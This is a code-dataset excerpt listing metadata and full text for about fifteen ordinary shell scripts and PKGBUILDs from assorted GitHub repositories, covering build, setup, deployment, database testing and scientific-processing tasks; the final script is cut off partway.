blob_id
stringlengths 40
40
| language
stringclasses 1
value | repo_name
stringlengths 4
115
| path
stringlengths 2
970
| src_encoding
stringclasses 28
values | length_bytes
int64 31
5.38M
| score
float64 2.52
5.28
| int_score
int64 3
5
| detected_licenses
listlengths 0
161
| license_type
stringclasses 2
values | text
stringlengths 31
5.39M
| download_success
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|
5846be66cad59f7be841d27ddf7188d8b72bc9e2
|
Shell
|
hmontero1205/pygrader
|
/gen_assignment.sh
|
UTF-8
| 601
| 4.09375
| 4
|
[] |
permissive
|
#!/bin/bash
if [ "$#" -lt 1 ]; then
echo "Usage: $0 <assignment name> [org/repo to clone on setup]" >&2
exit 1
fi
cd "$(dirname "$0")"
ASS="$(echo "$1" | tr '[:upper:]' '[:lower:]')"
if [ -d "$ASS" ]; then
read -p "Overwrite '$ASS'? [y/N]: " RESP
if [ "$RESP" == y ] || [ "$RESP" == Y ]; then
rm -rf "$ASS"
else
exit 1
fi
fi
mkdir "$ASS" || exit
cp rubric.json.in "$ASS/rubric.json"
cp grader.py.in "$ASS/grader.py"
sed -i "s/ASSIGNMENT/$ASS/g" "$ASS/grader.py"
test "$#" -gt 1 && cp clone_setup.in "$ASS/setup"
touch "$ASS/setup"
chmod +x "$ASS/setup"
sed -i "s~REPO~$2~g" "$ASS/setup"
| true
|
204a3e8c4234ba53d0156e22b49a27992e395802
|
Shell
|
fragsalat/stups2go
|
/agent/tools/run-with-postgres
|
UTF-8
| 1,808
| 4.34375
| 4
|
[
"LicenseRef-scancode-warranty-disclaimer",
"Apache-2.0"
] |
permissive
|
#!/bin/sh
TOOLS_DIR=$(dirname $0)
if [ $# -lt 5 ]; then
echo "Usage: $0 <postgres-version> <dbname> <docker-image> [<docker-opts>] -- <command>" >&2
exit 1
fi
DOCKER_IMAGE=$3
DB_VERSION=$1
DB_NAME=$2
DB_HOST=test-postgres
DB_PORT=5432
DB_SUBNAME="//$DB_HOST:$DB_PORT/$DB_NAME"
DB_USER=postgres
DB_PASSWORD=postgres
# clean-up old Docker container
docker rm -fv $DB_HOST
# start postgres
echo "INFO: Starting PostgreSQL database..."
docker run -d --name $DB_HOST -e POSTGRES_PASSWORD=$DB_PASSWORD postgres:$DB_VERSION
[ $? -ne 0 ] && exit 1
# wait until db was bootstrapped
COUNTER=0
while [ true ]; do
docker run --rm --link $DB_HOST -e PGPASSWORD=$DB_PASSWORD --entrypoint psql postgres:$DB_VERSION -h $DB_HOST -p $DB_PORT -U $DB_USER -c "CREATE DATABASE \"${DB_NAME}\";"
[ $? -eq 0 ] && break
if [ $COUNTER -gt 60 ]; then
echo "ERROR: Not waiting any longer for PostgreSQL database to come up!"
docker rm -f -v $DB_HOST
[ $? -ne 0 ] && echo "ERROR: Could not cleanly shut down PostgreSQL server!"
exit 1
fi
echo "INFO: Waiting for database to come up..."
sleep 5
COUNTER=$(($COUNTER + 5))
done
# remove first 3 args, we saved them leaving us with docker opts and command for the run tool
shift 3
# container link and setup
DOCKER_OPTS="--link $DB_HOST -e DB_SUBNAME=$DB_SUBNAME -e DB_NAME=$DB_NAME -e DB_HOST=$DB_HOST -e DB_PORT=$DB_PORT -e DB_USER=$DB_USER -e DB_PASSWORD=$DB_PASSWORD"
# execute real command
echo "INFO: Database ready, running actual command..."
$TOOLS_DIR/run $DOCKER_IMAGE $DOCKER_OPTS $*
status=$?
# shutdown postgres
echo "INFO: Shutting down database..."
docker rm -f -v $DB_HOST
[ $? -ne 0 ] && echo "ERROR: Could not cleanly shut down PostgreSQL server!"
# give correct feedback
exit $status
| true
|
16cfdac9a303b37ac2a0915e179916a3c52f107c
|
Shell
|
yswallow/wbsv-cli
|
/upversion.sh
|
UTF-8
| 851
| 3.359375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/bash
echo "?=>(y|RETURN KEY)"
echo -n "plz version: "
read -r v
echo "new version: ${v}"
echo -n "update files ok?:"
read -r f
if [[ "${f}" -eq 'y' ]]; then
for i in README.md setup.py wbsv/*py; do
sed -i -r "s_[0-9]+\.[0-9]+\.[0-9]+_${v}_g" "${i}"
done
fi
echo -n "rm build dist wbsv.egg-info ok?:"
read -r f
if [[ "${f}" -eq 'y' ]]; then
sudo rm -rf build dist wbsv.egg-info
python3 setup.py sdist bdist_wheel
fi
echo -n "git add ok?:"
read -r f
if [[ "${f}" -eq 'y' ]]; then
git add .
fi
echo -n "git commit ok?:"
read -r f
if [[ "${f}" -eq 'y' ]]; then
echo -n "plz message(${v}): "
read -r m
git commit -m "${m}"
fi
echo -n "deploy pypi ok?(${v}):"
read -r f
if [[ "${f}" -eq 'y' ]]; then
python3 -m twine upload --repository pypi dist/*
fi
echo -n "push github ok?:"
read -r f
if [[ "${f}" -eq 'y' ]]; then
git push
fi
| true
|
966ce74a5e3c8168d23f256a19d5c5892917352f
|
Shell
|
oloomi/prom
|
/evaluation/get-data.sh
|
UTF-8
| 2,611
| 2.859375
| 3
|
[] |
no_license
|
#!/bin/bash
make_exp_dir() {
mkdir -p $1/genome-mutated $1/mappings/bowtie $1/mappings/bwa $1/reads $1/results $1/variants
}
create_dir() {
mkdir $1
cd $1
mkdir -p genome-ref/repeats simulated-data/begin-supermax simulated-data/middle-supermax real-data/back-mutate
make_exp_dir simulated-data/begin-supermax
make_exp_dir simulated-data/middle-supermax
make_exp_dir real-data/back-mutate
}
get_genome() {
wget -O - $1 | gunzip -c > ./genome-ref/ref-genome.fna
}
find_repeats() {
cd ./genome-ref/repeats
mkvtree -db ../ref-genome.fna -dna -v -allout -pl
vmatch -supermax -l $1 -h 1 ref-genome.fna > supermax-repeats.txt
vmatch -l $1 -d -p ref-genome.fna > all-repeats.txt
vmatch -tandem -l $1 ref-genome.fna > tandem-repeats.txt
cd ../..
}
# run_id read_len dir
get_reads() {
fastq-dump --outdir $3/reads/fastq --gzip --skip-technical --readids --read-filter pass --dumpbase --split-files --clip $1
gunzip $3/reads/fastq/$1_pass_1.fastq.gz
fastx_trimmer -l $2 -m $2 -Q33 -i $3/reads/fastq/$1_pass_1.fastq -o $3/reads/reads.fq
}
# run_id read_len dir url
get_reads_ena() {
wget $4 -P $3/reads/fastq
gunzip $3/reads/fastq/$1_1.fastq.gz
fastx_trimmer -l $2 -m $2 -Q33 -i $3/reads/fastq/$1_1.fastq -o $3/reads/reads.fq
}
prepare_data() {
create_dir $1
get_genome $3
find_repeats $2
cd ..
}
# Mycobacterium Tuberculosis H37rv
prepare_data mtb 150 ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/195/955/GCF_000195955.2_ASM19595v2/GCF_000195955.2_ASM19595v2_genomic.fna.gz
get_reads SRR2818101 150 mtb/real-data/back-mutate
# Escherichia coli
prepare_data ecoli 100 ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/005/845/GCF_000005845.2_ASM584v2/GCF_000005845.2_ASM584v2_genomic.fna.gz
#get_reads ERR022075 100 yeast/real-data/back-mutate
get_reads_ena ERR022075 100 ecoli/real-data/back-mutate ftp://ftp.sra.ebi.ac.uk/vol1/fastq/ERR022/ERR022075/ERR022075_1.fastq.gz
mv yeast/real-data/back-mutate/reads.fq yeast/real-data/back-mutate/all-reads.fq
seqtk sample -s100 yeast/real-data/back-mutate/all-reads.fq 2500000 > yeast/real-data/back-mutate/reads.fq
# Saccharomyces cerevisiae S288C (baker's yeast)
prepare_data yeast 150 ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCF/000/146/045/GCF_000146045.2_R64/GCF_000146045.2_R64_genomic.fna.gz
#get_reads ERR1938683 150 yeast/real-data/back-mutate
get_reads_ena ERR1938683 150 yeast/real-data/back-mutate ftp://ftp.sra.ebi.ac.uk/vol1/fastq/ERR193/003/ERR1938683/ERR1938683_1.fastq.gz
# Human chromosome 19 GRCh38.p7 assembly
#prepare_data human-chr19 100 http://hgdownload.cse.ucsc.edu/goldenPath/hg38/chromosomes/chr19.fa.gz
| true
|
be14374d5c73cac8cfde17a3868125687ce578ba
|
Shell
|
115606666/install-imx
|
/imxy18.sh
|
UTF-8
| 1,235
| 3.09375
| 3
|
[] |
no_license
|
#!/bin/sh
if [ "$#" -ne 2 ]; then
echo "$0 email name"
exit
fi
echo 0=$0
echo 1=$1
echo 2=$2
sudo apt-get update && \
sudo apt-get -y dist-upgrade && \
sudo apt-get -y install gawk wget git-core diffstat unzip texinfo \
gcc-multilib build-essential chrpath socat libsdl1.2-dev \
libsdl1.2-dev xterm sed cvs subversion coreutils texi2html \
docbook-utils python-pysqlite2 help2man make gcc g++ \
desktop-file-utils libgl1-mesa-dev libglu1-mesa-dev \
mercurial autoconf automake groff curl lzop asciidoc \
u-boot-tools libncurses5-dev lib32ncursesw5-dev \
bc pv vim openssh-server tmux && \
sudo cp /usr/share/zoneinfo/Asia/Taipei /etc/localtime && \
echo 'LANG="en_US.UTF-8"' | sudo dd of=/etc/default/locale && \
echo 'Asia/Taipei' | sudo dd of=/etc/timezone && \
sudo locale-gen en_US.UTF-8 && \
sudo dpkg-reconfigure -f non-interactive tzdata
sudo wget https://commondatastorage.googleapis.com/git-repo-downloads/repo -O /usr/local/bin/repo
sudo chmod 755 /usr/local/bin/repo
sudo gpasswd -a mike sudo
git config --global user.email $1
git config --global user.name $2
git config --global color.ui auto
git config -l
echo export LC_ALL="en_US.UTF-8" >> ~/.bashrc
| true
|
3f40dc0578f3ef9a80e1a60420611a4aad92673f
|
Shell
|
viniciustbitencourt/rundeck
|
/maintenance/checklogstash.sh
|
UTF-8
| 216
| 3.15625
| 3
|
[] |
no_license
|
#!/bin/bash
status=`systemctl status logstash.service | awk 'NR==3' | awk '{print $2}'`
if [ $status == "active" ]; then
echo "OK"
exit 0
else
echo "Logstash indisponivel"
exit 1
fi
| true
|
82c3a814245a940946779b809203c1c494da646e
|
Shell
|
agimus/agimus-demos
|
/ur10/docker/set_env_for_ur10
|
UTF-8
| 342
| 2.546875
| 3
|
[
"BSD-2-Clause"
] |
permissive
|
#!/bin/bash
export HPP_HOST=192.168.56.1
export ROS_IP=$HPP_HOST
export UR10_IP=`echo $HPP_HOST | sed 's/[0-9]\+$/1/'`
export ROS_MASTER_URI="http://$UR10_IP:11311"
#Solve the error on Gazebo: "Exception sending a message"
export IGN_IP=127.0.0.1
echo "HPP_HOST=$HPP_HOST"
echo "UR10_IP=$UR10_IP"
echo "ROS_MASTER_URI=$ROS_MASTER_URI"
| true
|
9388105764fb60be93c3fa92a1b0d8b0c747f5b4
|
Shell
|
KaOSx/main
|
/chromaprint/PKGBUILD
|
UTF-8
| 753
| 2.734375
| 3
|
[] |
no_license
|
pkgname=chromaprint
pkgver=1.5.1
_commit=aa67c95b9e486884a6d3ee8b0c91207d8c2b0551
pkgrel=2
pkgdesc='Client-side library that implements a custom algorithm for extracting fingerprints from any audio source'
url='https://github.com/acoustid/chromaprint/'
arch=('x86_64')
license=('LGPL')
depends=('ffmpeg')
makedepends=('cmake')
#source=("https://github.com/acoustid/chromaprint/releases/download/v${pkgver}/${pkgname}-${pkgver}.tar.gz")
source=("https://github.com/acoustid/chromaprint/archive/${_commit}.zip")
md5sums=('ce6968a35f7848618a144d5a40efcb6f')
build() {
cmake -B build -S ${pkgname}-${_commit} \
-DCMAKE_BUILD_TYPE=Release \
-DBUILD_TOOLS=ON \
-DCMAKE_INSTALL_PREFIX=/usr
cmake --build build
}
package() {
DESTDIR=${pkgdir} cmake --install build
}
| true
|
9798d11a719c8fc69dd89fd683c6d06ed3a0a1f4
|
Shell
|
MinaProtocol/mina
|
/scripts/ocamlmerlin
|
UTF-8
| 195
| 2.546875
| 3
|
[
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
# Created at http://ellenandpaulsnewstartup.com - we're hiring!
script=$(basename $0)
DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
$DIR/run-in-docker "$script" ${@} <&0
| true
|
8650af3a03e7aa5469b75df7ddf71992bfb099f4
|
Shell
|
mrirecon/ring
|
/Fig2/run.sh
|
UTF-8
| 3,826
| 2.6875
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
if [ ! -e $TOOLBOX_PATH/bart ] ; then
echo "\$TOOLBOX_PATH is not set correctly!" >&2
exit 1
fi
export PATH=$TOOLBOX_PATH:$PATH
export BART_COMPAT_VERSION="v0.4.00"
#--- Double Angle Sx != Sy != Sxy ---
RO=128
GD=0.3:-0.1:0.2
#
touch DA_Sx_Sy_Sxy_RING.txt
touch DA_Sx_Sy_Sxy_ACadaptive.txt
for (( SP=3; $SP<$RO; SP++ )); do
bart traj -x$RO -y$SP -r -G -c tnom # nominal
bart traj -x$RO -y$SP -r -G -q$GD -c -O tGD # parallel + orthogonal shift
bart scale 0.5 tGD tGDov # increase FOV
bart phantom -k -s8 -t tGDov kGD
# RING method
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> DA_Sx_Sy_Sxy_RING.txt
# AC-Adaptive method
bart extract 1 1 $RO kGD kGD1
bart extract 1 1 $RO tnom tnom1
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> DA_Sx_Sy_Sxy_ACadaptive.txt
done
#--- Single Angle Sx != Sy != Sxy ---
RO=128
GD=0.3:-0.1:0.2
touch SA_Sx_Sy_Sxy_RING.txt
touch SA_Sx_Sy_Sxy_ACadaptive.txt
for (( SP=3; $SP<$RO; SP++ )); do
bart traj -x$RO -y$SP -r -H -c tnom # nominal
bart traj -x$RO -y$SP -r -H -q$GD -c -O tGD # parallel + orthogonal shift
bart scale 0.5 tGD tGDov
bart phantom -k -s8 -t tGDov kGD
# RING method
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> SA_Sx_Sy_Sxy_RING.txt
# AC-Adaptive method
bart extract 1 1 $RO kGD kGD1
bart extract 1 1 $RO tnom tnom1
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> SA_Sx_Sy_Sxy_ACadaptive.txt
done
#--- Double Angle Sx != Sy, Sxy=0 ---
RO=128
GD=0.3:-0.1:0
touch DA_Sx_Sy_RING.txt
touch DA_Sx_Sy_ACadaptive.txt
for (( SP=3; $SP<$RO; SP++ )); do
bart traj -x$RO -y$SP -r -G -c tnom # nominal
bart traj -x$RO -y$SP -r -G -q$GD -c -O tGD # parallel + orthogonal shift
bart scale 0.5 tGD tGDov
bart phantom -k -s8 -t tGDov kGD
# RING method
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> DA_Sx_Sy_RING.txt
# AC-Adaptive method
bart extract 1 1 $RO kGD kGD1
bart extract 1 1 $RO tnom tnom1
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> DA_Sx_Sy_ACadaptive.txt
done
#--- Single Angle Sx != Sy, Sxy=0 ---
RO=128
GD=0.3:-0.1:0
touch SA_Sx_Sy_RING.txt
touch SA_Sx_Sy_ACadaptive.txt
for (( SP=3; $SP<$RO; SP++ )); do
bart traj -x$RO -y$SP -r -H -c tnom # nominal
bart traj -x$RO -y$SP -r -H -q$GD -c -O tGD # parallel + orthogonal shift
bart scale 0.5 tGD tGDov
bart phantom -k -s8 -t tGDov kGD
# RING method
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> SA_Sx_Sy_RING.txt
# AC-Adaptive method
bart extract 1 1 $RO kGD kGD1
bart extract 1 1 $RO tnom tnom1
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> SA_Sx_Sy_ACadaptive.txt
done
#--- Double Angle Sx == Sy, Sxy=0 ---
RO=128
GD=0.3:0.3:0
touch DA_Sx_RING.txt
touch DA_Sx_ACadaptive.txt
for (( SP=3; $SP<$RO; SP++ )); do
bart traj -x$RO -y$SP -r -G -c tnom # nominal
bart traj -x$RO -y$SP -r -G -q$GD -c -O tGD # parallel + orthogonal shift
bart scale 0.5 tGD tGDov
bart phantom -k -s8 -t tGDov kGD
# RING method
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> DA_Sx_RING.txt
# AC-Adaptive method
bart extract 1 1 $RO kGD kGD1
bart extract 1 1 $RO tnom tnom1
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> DA_Sx_ACadaptive.txt
done
#--- Single Angle Sx != Sy, Sxy=0 ---
RO=128
GD=0.3:0.3:0
touch SA_Sx_RING.txt
touch SA_Sx_ACadaptive.txt
for (( SP=3; $SP<$RO; SP++ )); do
bart traj -x$RO -y$SP -r -H -c tnom # nominal
bart traj -x$RO -y$SP -r -H -q$GD -c -O tGD # parallel + orthogonal shift
bart scale 0.5 tGD tGDov
bart phantom -k -s8 -t tGDov kGD
# RING method
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay -R tnom kGD) >> SA_Sx_RING.txt
# AC-Adaptive method
bart extract 1 1 $RO kGD kGD1
bart extract 1 1 $RO tnom tnom1
echo -e $SP "\t" $(DEBUG_LEVEL=0 bart estdelay tnom1 kGD1) >> SA_Sx_ACadaptive.txt
done
rm k*cfl k*hdr t*cfl t*hdr
| true
|
4c27a54487de7de2eef8f389bd62a60533f2ba62
|
Shell
|
yuhuachang/yuhuachang.github.io
|
/scripts/create-database.sh
|
UTF-8
| 245
| 3.203125
| 3
|
[] |
no_license
|
#!/bin/bash
DB_DATABASE=$1
if [ "$DB_DATABASE" == "" ]; then
echo "usage $0 <databbase>"
exit
fi
sudo su - postgres -c "dropdb $DB_DATABASE" 2>/dev/null
sudo su - postgres -c "createdb $DB_DATABASE"
sudo su - postgres -c "psql --list"
| true
|
fcb6090b0af0411feb7bc6f5b50fd9eaf81443ab
|
Shell
|
jackzampolin/btcd-ops
|
/btcd.sh
|
UTF-8
| 342
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/bash
DIR="$HOME/.btcd"
if [ "$1" == "start" ]; then
$HOME/go/bin/btcd 1>> "$DIR/btcd_stdout.log" 2>> "$DIR/btcd_stderr.log" & echo $! > "$DIR/btcd.pid"
elif [ "$1" == "stop" ]; then
kill -SIGINT $(cat "$DIR/btcd.pid")
elif [ "$1" == "logs" ]; then
tail -f "$DIR/btcd_stdout.log"
else
echo "btcd {{ start | stop | logs }}"
fi
| true
|
a87e46ebf1af1cb1e3dec35feffb88fdc5bdeaaa
|
Shell
|
boris-chernysh/dotfiles
|
/i3/scripts/screens.sh
|
UTF-8
| 263
| 3.359375
| 3
|
[] |
no_license
|
#!/bin/bash
SCREENS_COUNT=$(xrandr | grep ' connected' -c)
DIR=$(dirname "${BASH_SOURCE[0]}")
echo $DIR > /tmp/screenslog
case "$SCREENS_COUNT" in
3) bash "$DIR/screenlayout/3.sh";;
2) bash "$DIR/screenlayout/2.sh";;
*) bash "$DIR/screenlayout/1.sh";;
esac
| true
|
33df2388b42c25c940ef6304546659666ad47b08
|
Shell
|
petronny/aur3-mirror
|
/hooktftp-git/PKGBUILD
|
UTF-8
| 868
| 2.78125
| 3
|
[] |
no_license
|
# Maintainer: Josh Cartwright <joshc@eso.teric.us>
pkgname=hooktftp-git
pkgver=0.10.0.r28.g8bba8e8
pkgrel=1
pkgdesc="Hook based tftp server"
arch=('x86_64' 'i686')
url="https://github.com/epeli/hooktftp"
license=('MIT')
makedepends=('go' 'bzr')
source=('git://github.com/epeli/hooktftp.git')
md5sums=('SKIP')
pkgver() {
cd "$srcdir"/hooktftp
git describe --long --tags | sed 's/\([^-]*-g\)/r\1/;s/-/./g'
}
prepare() {
# Quick hack to put the makepkg-checked-out clone into GOPATH
mkdir -p "$srcdir"/src/github.com/epeli
ln -sf "../../../hooktftp" "$srcdir"/src/github.com/epeli/hooktftp
GOPATH="$srcdir" go get -v -x launchpad.net/goyaml
}
build() {
GOPATH="$srcdir" go get github.com/epeli/hooktftp
}
package() {
install -Dm755 "$srcdir/bin/hooktftp" "$pkgdir/usr/bin/hooktftp"
install -Dm644 "$srcdir/hooktftp/LICENSE" \
"$pkgdir/usr/share/licenses/hooktftp/LICENSE"
}
| true
|
892d9839d0e7ca1b459f6a6c511bda5258ee5187
|
Shell
|
poojagaikwad1358/Day14_UserRegistration
|
/userRegistration.sh
|
UTF-8
| 2,083
| 3.78125
| 4
|
[] |
no_license
|
#!/bin/bash -x
#Use Case 1- As a User need to enter a valid First Name.
echo "Welcome to User Registration"
echo "Enter User First Name :"
read firstName;
namepattern="^[A-Z][a-z]{3,}$"
if [[ $firstName =~ $namepattern ]]
then
echo "Valid"
else
echo "Invalid"
fi
#UseCase2- As a User need to enter a valid last Name.
echo "Enter User last Name : "
read lastName;
lastNamepattern="^[A-Z][a-z]{3,}$"
if [[ $lastName =~ $lastNamepattern ]]
then
echo "Valid"
else
echo "Invalid"
fi
#UseCase3 - As a user need to enter valid email.
echo "Enter the User EmailId: "
read emailId;
emailIdpattern="^[a-z A-Z 0-9 . - _ +]*[@][a-z 0-9]*[.][a-z ,]*[.][a-z ,]*$"
if [[ $emailId =~ $emailIdpattern ]]
then
echo "valid EmailId"
else
echo "Invalid EmailId"
fi
#UseCase4 - As a User need to follow pre-defined Mobile Format
echo "Enter Mobile number: "
read mobNo;
mobilePattern="^[0-9]{2}[ ][1-9]{1}[0-9]{9}"
if [[ $mobNo =~ $mobilePattern ]]
then
echo "Valid number."
else
echo "Invalid number."
fi
#UseCase5- As a user need to follow pre-defined Password rules.
#Rule1- Minimum 8 character
read -p "Enter Password: " password
passwordPattern="[a-z]{8,}"
if [[ $password =~ $passwordPattern ]]
then
echo "Valid password."
else
echo "Invalid password."
fi
#UseCase6- Rule2- Should have atleast 1 Upper Case
read -p "Enter Password: " password2
passwordPattern2="[a-zA-Z]{8,}"
if [[ $password2 =~ $passwordPattern2 ]]
then
echo "Valid password."
else
echo "Invalid password."
fi
#UseCase7- Rule3- Should have atleast 1 numeric number in the password
read -p "Enter Password: " password3
passwordPattern3="^[a-zA-Z0-9]{8,}"
if [[ $password3 =~ $passwordPattern3 ]]
then
echo "Valid password."
else
echo "Invalid password."
fi
#UseCase8- Rule4- Has exactly 1 Special character
echo "Enter the User Password:"
read password4;
passwordpattern4="[a-z A-Z 0-9 \!\@\#\$\%\^\&\* ? = . ]{8}$"
if [[ $password4 =~ $passwordpattern4 ]]
then
echo "Valid Password"
else
echo "Invalid Password"
fi
| true
|
0f1b1ab119fc76b02926518a4c7a3235a13aa967
|
Shell
|
wrtcoder/BPI-files
|
/others/bpi-service/var/lib/bananapi/bpi-init.d/S03-bpi-sw-gpu.sh
|
UTF-8
| 548
| 3.375
| 3
|
[] |
no_license
|
#!/bin/bash
BOARD=$(bpi-hw)
XSGXFILE="/usr/share/lightdm/lightdm.conf.d/55-xserver-command-pvr.conf"
XSGXBAK="/usr/share/lightdm/lightdm.conf.d/.55-xserver-command-pvr.conf"
setup_xsgx_xserver()
{
if [ -f "/usr/local/XSGX/bin/X" ] ; then
if [ ! -f "$XSGXFILE" ] ; then
cp -a $XSGXBAK $XSGXFILE
fi
fi
}
setup_normal_xserver()
{
if [ -f "$XSGXFILE" ] ; then
rm -f $XSGXFILE
fi
}
setup_board()
{
case ${BOARD} in
bpi-m3)
setup_xsgx_xserver
;;
*)
setup_normal_xserver
;;
esac
}
#main
setup_board
| true
|
4867918934f0b7c6fb8ae8ac75df6b6d9ea317fb
|
Shell
|
alekye/AYConfiguration
|
/run.sh
|
UTF-8
| 371
| 3.328125
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
# auto pull the configure file
BASE_URL=https://raw.githubusercontent.com/alekye/AYConfiguration/master
DISABLE_CACHE="?v=$(date +%s)"
function echo_green() {
echo "\033[32m$1\033[0m"
}
# .vimrc
VIMRC_FILE=${BASE_URL}/vimrc${DISABLE_CACHE}
echo "Download .vimrc to ~/.vimrc from ${VIMRC_FILE}"
curl -o ~/.vimrc ${VIMRC_FILE}
echo "Download .vimrc 【OK】"
| true
|
79f2106666a8d0e0e1b65c6e0c4862e62b2b5304
|
Shell
|
Zriakhov/petclinic
|
/jenkins_file/VM2_start.sh
|
UTF-8
| 422
| 3.046875
| 3
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
#!/bin/bash
a=$(sudo docker ps | grep petclinic | cut -d' ' -f 1)
echo "ID container="$a
if [ -n "${a}" ]; then
echo "Conteiner runing"
docker-compose -f docker-compose_petclinic.yml stop
docker-compose -f docker-compose_petclinic.yml rm -f
else
echo "Conteiner don't run"
fi
docker rmi 10.23.27.6:443/petclinic -f
docker pull 10.23.27.6:443/petclinic:stable
docker-compose -f docker-compose_petclinic.yml up -d
| true
|
20bb642f4c20a9cdea7bd9e37b78578131447db6
|
Shell
|
NoahRJohnson/MapReduce-Basic-Statistics
|
/q2_TwoPass.sh
|
UTF-8
| 394
| 2.625
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
# The output of TwoPass_Mean.py is 'key mean'
tmp=$(python electricityVariance_TwoPass_Mean.py Example\ Data/Electricity.csv)
# extract the mean
mean=$(echo $tmp | cut -d' ' -f2)
# Pass the mean as a parameter to the reducers in TwoPass_Variance.py
python electricityVariance_TwoPass_Variance.py Example\ Data/Electricity.csv --jobconf my.job.settings.mean=$(echo $mean)
| true
|
3163d71584aecac9558780649482f8eebc49cdf1
|
Shell
|
azimut/dotfiles
|
/homedir/bin/piano.sh
|
UTF-8
| 715
| 2.921875
| 3
|
[] |
no_license
|
#!/bin/bash
SESSION='piano'
SF='/usr/local/share/samples/sf_GMbank.sf2'
OPTS=()
# OPTS=(-R yes)
if ! aconnect -i | grep "client 20: 'CH345'"; then
echo "Midi cable not connected?"
exit 1
fi
if tmux has -t "${SESSION}"; then
echo "attaching session...${SESSION}"
if [[ -z $TMUX ]]; then
tmux attach -t "${SESSION}"
else
tmux switch-client -t "${SESSION}"
fi
exit 0
fi
tmux new -d -s "${SESSION}" \; \
switch-client -t "${SESSION}" \; \
split-window -h midihack \; \
split-window -v fluidsynth "${OPTS[@]}" --gain 1 -a alsa "${SF}" \; \
select-pane -L
aconnect 20:0 130:0 # piano -> midihack
sleep 2 # wait for fluidsynth to be ready
aconnect 130:1 131:0 # midihack -> fluidsynth
| true
|
7b3477161b42ad2f7d562b3289ac27e02a5a4512
|
Shell
|
pigfly/pigfly.github.io
|
/script/cibuild.sh
|
UTF-8
| 592
| 3.53125
| 4
|
[
"Apache-2.0",
"CC-BY-4.0"
] |
permissive
|
#!/bin/bash
# skip if build is triggered by pull request
if [ $TRAVIS_PULL_REQUEST == "true" ]; then
echo "this is PR, exiting"
exit 0
fi
# enable error reporting to the console
set -e
# cleanup "_site"
rm -rf _site
mkdir _site
# clone remote repo to "_site"
git clone https://${GH_TOKEN}@github.com/pigfly/pigfly.github.io.git --branch gh-pages _site
# build with Jekyll into "_site"
bundle exec jekyll build
# push
cd _site
git config user.email "pigflyjky@gmail.com"
git config user.name "Alex Jiang"
git add --all
git commit -a -m "Travis #$TRAVIS_BUILD_NUMBER"
git push --force origin gh-pages
| true
|
92d06a7d0dade5e6b32402cc66603a93f3fe4eb8
|
Shell
|
abhirupray14/Shell_Programs
|
/CheckEven.sh
|
UTF-8
| 158
| 3.4375
| 3
|
[] |
no_license
|
echo “Enter any value for n:”
read n
a=`expr $n % 2`
if [ $a -eq 0 ]
then
echo Given number $n is even
else
echo Given number $n is odd
fi
| true
|
f1b541eeca89bee4d5ab1f18a2cde5ac501c499b
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/sentaku/PKGBUILD
|
UTF-8
| 574
| 2.640625
| 3
|
[] |
no_license
|
# Maintainer: Kyle MacLeod <aur.kmac5@recursor.net>
pkgname=sentaku
pkgver=0.5.5
pkgrel=1
pkgdesc="Utilily to make sentaku (selection) window with shell command."
arch=('any')
url="https://github.com/rcmdnk/sentaku"
license=('MIT')
depends=()
source=("https://github.com/rcmdnk/sentaku/archive/v${pkgver}.zip")
md5sums=('70b68552ce0c0d8277eea6be1f2c880d')
package() {
cd "${srcdir}/${pkgname}-${pkgver}/bin"
install -D -m755 "./$pkgname" "$pkgdir/usr/bin/$pkgname"
install -d "$pkgdir/usr/share/sentaku"
install -D -m755 ddv *.sh "$pkgdir/usr/share/sentaku"
}
# vim:set ts=2 sw=2 et:
| true
|
6dbb8b1b1efebc0da6870cdb713fa6664ba9a9ab
|
Shell
|
ozgurgul/hcp-demo-env-aws-terraform
|
/bin/experimental/minio_wait_for_mlflow_configured_state.sh
|
UTF-8
| 1,264
| 3.734375
| 4
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
exec > >(tee -i generated/log-$(basename $0).txt)
exec 2>&1
set -e
if [[ -z $1 || -z $2 ]]; then
echo Usage: $0 TENANT_ID MLFLOW_KD_CLUSTERNAME
exit 1
fi
set -u
echo "Running script: $0 $@"
./scripts/check_prerequisites.sh
source ./scripts/variables.sh
export TENANT_ID=$1
export MLFLOW_CLUSTER_NAME=$2
ssh -q -o StrictHostKeyChecking=no -i "${LOCAL_SSH_PRV_KEY_PATH}" -T ubuntu@${RDP_PUB_IP} <<-EOF1
set -eu
set -o pipefail
export CLUSTER_ID=\$(hpecp tenant list --query "[?_links.self.href == '$TENANT_ID'] | [0] | [_links.k8scluster]" --output text)
export TENANT_NS=\$(hpecp tenant list --query "[?_links.self.href == '$TENANT_ID'] | [0] | [namespace]" --output text)
echo Waiting for Notebook to have state==configured
COUNTER=0
while [ \$COUNTER -lt 30 ];
do
STATE=\$(kubectl --kubeconfig <(hpecp k8scluster --id \$CLUSTER_ID admin-kube-config) \
